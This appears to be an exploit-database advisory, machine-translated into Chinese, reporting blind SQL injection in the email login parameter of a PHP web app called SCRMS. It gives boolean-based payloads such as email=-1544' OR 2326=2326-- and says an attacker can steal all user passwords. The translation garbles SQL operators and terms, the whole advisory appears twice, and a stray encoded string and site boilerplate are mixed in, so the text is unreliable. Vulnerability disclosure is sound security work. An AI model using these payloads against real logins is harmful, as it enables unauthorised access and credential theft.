##利用标题: SCRMS 2023-05-27 1.0-多个SQLI
##作者: nu11secur1ty
## date: 05.27.2023
## vendor: https://github.com/oretnom23
## software: https://www.sourcecodester.com/php/...ystem-using-php-free-source-source-coude.html
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
“电子邮件参数似乎很容易受到SQL注入的影响
攻击。测试有效载荷45141002'或6429=6429-和37491017'或
5206=5213-均在电子邮件参数中提交。这两个
请求产生了不同的响应,表明输入是
以不安全的方式将其合并到SQL查询中。攻击者可以
轻松窃取所有用户及其密码以访问系统。
即使他们得到了强烈的加密,这也会有一些时间,但是
如果攻击者不够的话,攻击者不是问题
强烈加密。
状态:高脆弱性
[+]有效载荷:
``MySQL
---
参数:电子邮件(发布)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句
PAYLOLAL:电子邮件=-1544'或2326=2326-- eglcpassword=c5k!k0k!t7login=
---
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve.../vendors/oretnom23/2023/scrms-2023-05-27-1.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)
##时间花费:
01:00:00
- -
系统管理员- 基础设施工程师
穿透测试工程师
利用开发人员
www.exploit-db.com
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
##作者: nu11secur1ty
## date: 05.27.2023
## vendor: https://github.com/oretnom23
## software: https://www.sourcecodester.com/php/...ystem-using-php-free-source-source-coude.html
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
“电子邮件参数似乎很容易受到SQL注入的影响
攻击。测试有效载荷45141002'或6429=6429-和37491017'或
5206=5213-均在电子邮件参数中提交。这两个
请求产生了不同的响应,表明输入是
以不安全的方式将其合并到SQL查询中。攻击者可以
轻松窃取所有用户及其密码以访问系统。
即使他们得到了强烈的加密,这也会有一些时间,但是
如果攻击者不够的话,攻击者不是问题
强烈加密。
状态:高脆弱性
[+]有效载荷:
``MySQL
---
参数:电子邮件(发布)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句
PAYLOLAL:电子邮件=-1544'或2326=2326-- eglcpassword=c5k!k0k!t7login=
---
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve.../vendors/oretnom23/2023/scrms-2023-05-27-1.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)
##时间花费:
01:00:00
- -
系统管理员- 基础设施工程师
穿透测试工程师
利用开发人员
OffSec’s Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/